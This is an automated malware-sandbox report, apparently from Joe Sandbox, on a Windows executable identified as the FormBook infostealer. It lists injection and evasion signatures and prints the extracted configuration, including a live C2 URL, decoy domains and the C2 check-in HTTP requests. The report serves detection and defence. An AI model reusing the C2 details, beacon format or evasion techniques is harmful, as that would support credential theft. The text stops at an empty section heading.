Windows Analysis Report MAPO-PI.exe

Overview

General Information

Sample Name: MAPO-PI.exe
Analysis ID: 510736
MD5: c619bbbe3c374c8fd3e9f2c26d087496
SHA1: a8f7e80f2c8e7687789f2267935610f81bc773d4
SHA256: 260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
Tags: exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}
Multi AV Scanner detection for submitted file
Source: MAPO-PI.exe Virustotal: Detection: 30% Perma Link
Source: MAPO-PI.exe ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.MAPO-PI.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.MAPO-PI.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.MAPO-PI.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.MAPO-PI.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: MAPO-PI.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: MAPO-PI.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 159.65.10.143 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lifeinformpodcast.com
Source: C:\Windows\explorer.exe Domain query: www.transforming-leadership.com
Source: C:\Windows\explorer.exe Domain query: www.diofis.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 109.232.217.55 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.diofis.com/rigx/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR AEROTEK-ASTR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 28 Oct 2021 05:41:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797038-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Oct 2021 05:41:35 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 39 37 65 33 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 37 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.24content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache: misscontent-length: 33607date: Thu, 28 Oct 2021 05:41:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 39 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/#logo
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/#organization
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/#website
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/elma-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/maydanoz-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/meyve-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi-2/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/rahatlatici-cay/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/10/24/yulafli-kahvalti/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/01/cennet-tatlisi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/01/cikolatali-toplar/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/01/ketojenik-beslenme/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/19/aspir-yagi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/?s=
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/bize-ulasin/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/blog/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/category/guncel-diyet-meseleleri/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/category/sporcu-beslenmesi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/category/tarifler/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/comments/feed/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/feed/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hakkimizda/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/partnerlerimiz/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-includes/wlwmanifest.xml
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/wp-json/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com/xmlrpc.php?rsd
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: http://www.diofis.com?sccss=1&#038;ver=5.5.6
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://api.w.org/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://m0n.co/ga
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://schema.org
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-FE02SN0XC6
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://www.monsterinsights.com/
Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmp String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown DNS traffic detected: queries for: www.lifeinformpodcast.com
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
